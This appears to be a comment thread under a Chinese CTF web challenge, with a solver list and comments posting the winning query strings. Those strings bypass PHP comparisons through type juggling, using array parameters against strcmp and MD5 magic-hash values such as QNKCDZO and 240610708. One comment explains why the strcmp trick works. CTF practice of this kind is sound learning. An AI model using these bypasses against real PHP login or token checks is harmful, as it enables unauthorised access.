评分(14)
解题动态
yokoi 攻破了该题 10小时前
薄言. 攻破了该题 11小时前
GrantFly 攻破了该题 1天前
12白 攻破了该题 1天前
Myukio 攻破了该题 1天前
yyl 攻破了该题 2天前
店晓贰 攻破了该题 2天前
sc001 攻破了该题 3天前
fish12139 攻破了该题 3天前
hoyco 攻破了该题 3天前
才下课 攻破了该题 4天前
bctivy99 攻破了该题 4天前
kkctf 攻破了该题 4天前
zeroFish 攻破了该题 4天前
WWls= 攻破了该题 5天前
Actias 攻破了该题 5天前
平静的子弹 攻破了该题 5天前
ludam999666 攻破了该题 5天前
bugkuaccount3214 攻破了该题 5天前
评论
WWls= 5天前
举报
?v1[]=1&v2[]=12&v3[]=1 直接这样简单点不更好吗
miosrfmoire 11天前
举报
作者前女友是bugku吗,最后flag里面解码还有小彩蛋
公良棉 12天前
举报
首先CTRL+U打开源码,看到PHP代码,意思叫我们输入v1、v2、v3三个元素,v1、v2没什么好说的,可以见其他评论,然后if(!strcmp($v3, $flag))等价于if(v3 == flag字符串),我们可以利用 strcmp 漏洞原理,让输入的v3为一个数组(内容是什么不重要),这个时候strcmp会返回Null,而!Null=True,就拿到了flag
沈芷意 21天前
举报
?v1=QNKCDZO&v2=s878926199a&v3[]=1
syhaisy 1月前
举报
?v1=QNKCDZO&v2=240610708&v3[]=1
准备夺冠 2月前
举报
?v1[]=1&v2[]=2&v3[]=3
kitniu 2月前
举报
GET /?v1[]=5&v2[]=3&v3[]=1 HTTP/1.1
smartada 3月前
举报
http://171.80.2.169:12317/?v1[]=1&v2[]=2&v3[]=1111
冷暖自知fzq 4月前
举报
http://171.80.2.169:18359/index.php?chemin=&v1=240610708&v2=QNKCDZO&v3[]=
popk 5月前
举报
flag{******}